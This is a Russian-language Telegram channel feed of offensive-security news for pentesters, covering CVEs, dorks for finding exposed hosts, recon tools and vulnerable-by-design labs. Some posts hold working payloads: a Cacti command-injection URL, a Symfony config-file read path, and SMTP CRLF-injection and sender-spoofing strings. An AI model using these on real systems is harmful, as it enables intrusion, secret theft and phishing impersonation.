Pentester's Backlog
589 subscribers
309 photos
15 videos
44 files
424 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Волосатый бублик
#adcs #bloodhound #ad

[ ADCS Attack Paths in BloodHound ]

This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.

Part 1


Part 2
👍1
Forwarded from Netlas.io
CVE-2023-49606: RCE in Tinyproxy 1.10.0, 1.11.1, 9.8 rating 🔥

A use-after-free vulnerability in Tinyproxy allows an attacker to perform RCE via a specially crafted HTTP header.

Search at Netlas.io:
👉 Link: https://nt.ls/vWqHD
👉 Dork: http.headers.server:"tinyproxy/1.11.1" OR http.headers.server:"tinyproxy/1.10.0"

Read more: https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
💡 Если в ходе багбаунти/пентеста вы встретили веб-приложение на Symfony, проверьте наличие дебаг режима (/app_dev.php) и возможности чтения конфига: /app_dev.php/_profiler/open?file=app/config/parameters.yml

#tips #bugbounty #pentest
Forwarded from Proxy Bar
CVE-2024-29895 cacti
*
Command injection in cmd_realtime.php
*
fofa link
*
usage:
http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

#net
🥱2🥴1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-22120: Time Based SQL Injection in Zabbix Server Audit Log

Affected and fixed version/s:
* 6.0.0 - 6.0.27 / 6.0.28rc1
* 6.4.0 - 6.4.12 / 6.4.13rc1
* 7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2


Allows to dump any values from database. As an example of exploit above allows privilege escalation from user to admin. In some cases, SQL injection leads to RCE.


PoC: https://support.zabbix.com/secure/attachment/236280/236280_zabbix_server_time_based_blind_sqli.py

#exploit #pentest
Forwarded from Proxy Bar
CVE-2024-21683
Confluence Data Center and Server RCE
*
POC - 3 вариата

#Jirka
🎤 Кстати, на этой странице доступны все доклады с киберфестиваля 2024 Positive Hack Days. Если не присутствовали, то обязательно к просмотру!

👀 Смотреть
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from HaHacking
#заметки #offense

➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!

   🧩   ‟Old new email attacks”   [ 🐍 / 💻 / 💻⚡️


📌 ГЛАВНЫЕ ПОИНТЫ

▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail:     smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...

SSL port: 465
TLS port: 587


▪️Пробуйте разные входные точки:
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL


▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...

▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
    ▪️Python   [email]
    ▪️JS   [addressparser, email-addresses]
    ▪️C#   [System.Net.Mail]
    ▪️Go   [net/mail]
    ▪️Rust, Ruby, PHP, ...


🔑 ПЕЙЛОАДЫ НА ПРОБУ

...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]

📧➡️📧
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com

📧➡️📧, 📧, ...
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>

📧➡️📧, 📧
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>

📧➡️...
": <attacker@gmail.com> "<spoofed@gmail.com>"



☠️  ИМПАКТ & ПОСЛЕДСТВИЯ

▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация

❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых


💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;


➡️Stay safe.

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Aurélien Chalot @Defte_ ]

Wanna blindly check if the ADCS web enroll is installed on a domain ? Bruteforce the /certenroll endpoint without the trailing/ on all webservers. If you hit the ADCS web enroll you will get a location: /certenroll/ header in the response. Now enjoy blind ntlmrelayx ESC8 👀👀👀

Example. This webserver does not expose a ADCS web enroll endpoint but the Windows Admin Center panel. Yet your command will flag it as ADCS. While mine won't ;)

🐥 [ tweet ]
Forwarded from bin
Открываем настройки демона докера
nano /etc/docker/daemon.json


И добавляем рабочее зеркало, например gcr.io
{
"registry-mirrors": ["https://mirror.gcr.io"]
}


И рестарт
service docker restart


У вас также может быть заблокирован gcr, если вы подключаетесь по IPv6.

Еще парочка зеркал:
https://docker.mirrors.ustc.edu.cn
https://registry.docker-cn.com
https://cr.yandex/mirror/ (нельзя добавить в daemon.json; не все образы)

Второй вариант добавления зеркала:
nano /etc/sysconfig/docker

OPTIONS='--selinux-enabled --log-driver=journald --registry-mirror=<MIRROR>'

Еще увидел huecker.io, но на прод бы не поставил, как временное решение — ок.
🥱1
Forwarded from AP Security
#pentest

📣 CVE-2024-5522 (CVSS 10)
Критический дефект безопасности угрожает тысячам сайтов WordPress

📶Пользователям WordPress, которые установили популярный плагин HTML5 Video Player, настоятельно рекомендуется принять немедленные меры после обнаружения критической уязвимости безопасности.

📶Уязвимость, отслеживаемая как CVE-2024-5522, позволяет неаутентифицированным злоумышленникам внедрять вредоносный код SQL в базы данных веб-сайтов, потенциально подвергая риску конфиденциальную информацию или целостность сайта.

⚡️Учитывая более 30 000 активных установок, эта уязвимость представляет значительный риск для большого количества веб-сайтов WordPress.

Если обновление невозможно, временно отключите или удалите плагин, пока не будет доступно исправление.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1👍1🙏1🥱1🍌1
Forwarded from Kali Linux
⚡️ Вышла Kali Linux 2024.2 с 18 новыми инструментами и решением Проблемы 2038 года

Представлена новая версия
Kali Linux 2024.2, в которую вошли сразу 18 новых инструментов, а также исправление для известной проблемы Y2038.

В новой версии пока не доступно ядро Linux 6.8, но оно ожидается в следующей версии (2024.3).

Зато релиз содержит 18 новых куртых инструментов:

* autorecon: многопоточный инструмент для сетевой разведки
* coercer: автоматическое принуждение Windows-сервера к аутентификации на произвольной машине
* dploot: переписанная на Python версия SharpDPAPI
* getsploit: утилита для поиска и загрузки эксплоитов
* gowitness: утилита для создания скриншотов с использованием Chrome Headless
* horst: оптимизированный инструмент для радиосканирования
* ligolo-ng: инструмент для туннелирования через интерфейс TUN
* mitm6: взлом IPv4 через IPv6
* netexec — инструмент для эксплуатации сетевых служб, который помогает автоматизировать оценку безопасности больших сетей;
* pspy — инструмент для мониторинга процессов Linux без root-прав;
* pyinstaller — преобразование (упаковка) Python-программ в самостоятельные исполняемые файлы;
* pyinstxtractor — экстрактор PyInstalller;
* sharpshooter — фреймворк для генерации полезных нагрузок;
* sickle — инструмент для разработки полезных нагрузок;
* snort — гибкая система для обнаружения сетевых вторжений;
* sploitscan — простой поиск информации о CVE;
* vopono — запуск приложений через VPN-туннели с временными сетевыми пространствами имен (namespace);
* waybackpy — API для Wayback Machine с помощью Python.

В данном релизе исправлена проблема Y2038. Она возникает на Linux-системах из-за 32-битного представления времени. Чтобы решить проблему, time_t был изменен на 64-битный на 32-битных архитектурах ARM, которые используются в основном в образах для Raspberry Pi и NetHunter.

В дополнение к новым инструментам и исправлениям, Kali 2024.2 включает:

* Gnome 46 с обновленными темами и расширениями
* Обновленный Xfce для повышения стабильности и производительности

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1🥱1
Forwarded from 1N73LL1G3NC3
NetExec #335 Add Recall module for dumping all users Microsoft Recall DBs & screenshots

You can now remotely dump Recall data over the internet from Linux etc.
🎃3🔥2
Forwarded from SHADOW:Group
🔎Собираем поддомены и IP в RSECloud

Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.

Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:

Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY


Сбор IP'шников по домену:
rsescan -d example.com -cn -key YOUR_API_KEY


Сбор IP'шников по имени организации:
rsescan -so "Organization Name" -key YOUR_API_KEY


Для получения API ключа нужно просто пройти регистрацию по почте. Для всех желающих залил скрипт на гитхаб.

Ссылка на RSECloud
Ссылка на скрипт

#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱1
Forwarded from PurpleBear (Vadim Shelest)
Меня иногда просят посоветовать self-hosted лабы по различным доменам знаний деятельности пентестеров для наработки и совершенствования навыков на практике, поэтому ловите небольшую подборку:

☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster
☑️ DVWA - Damn Vulnerable Web Application
☑️ DVWS - Damn Vulnerable Web Sockets
☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android)
☑️ DVIA - Damn Vulnerable iOS App
☑️ DVIA2 - Damn Vulnerable iOS App v2
☑️ CI/CD Goat - Vulnerable CI/CD environment
☑️ DVGA - Damn Vulnerable GraphQL Application
☑️ VAmPI - Vulnerable REST API
☑️ DVSA - Damn Vulnerable Serverless Application
☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda)
☑️ AWS Goat - Damn Vulnerable AWS Infrastructure
☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc)
☑️ Azure Goat - Damn Vulnerable Azure Infrastructure
☑️ GCP Goat - Damn Vulnerable GCP Infrastructure
☑️ DVTA - Damn Vulnerable Thick Client App
☑️ DVJA - Damn Vulnerable Java (EE) Application
☑️ DVID - Damn Vulnerable IoT Device
☑️ DVAS - Damn Vulnerable Application Scanner
☑️ DVB - Damn Vulnerable Bank
☑️ DVWPS - Damn Vulnerable WordPress Site
☑️ DVNA - Damn Vulnerable NodeJS Application
☑️ DVGM - Damn Vulnerable Grade Management
☑️ Tiredful API - REST API intentionally designed broken App
☑️ DVCSharp - Damn Vulnerable C# Application (API)
☑️ DVRF - Damn Vulnerable Router Firmware
☑️ DVLLMP - Damn Vulnerable LLM Project
☑️ DVLLMA - Damn Vulnerable LLM Agent

Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎
🥱1
Forwarded from Netlas.io
CVE-2024-34102 and others: Multiple vulns in Magento Open Source, 4.8 - 9.8 rating 🔥🔥🔥

New vulnerabilities in Magento (and Adobe Commerce) for every taste: arbitrary code execution, security feature bypass and privilege escalation!

Search at Netlas.io:
👉 Link: https://nt.ls/rxUR7
👉 Dork: tag.name:"magento"

Vendor's advisory: https://helpx.adobe.com/security/products/magento/apsb24-40.html
😈2🥱1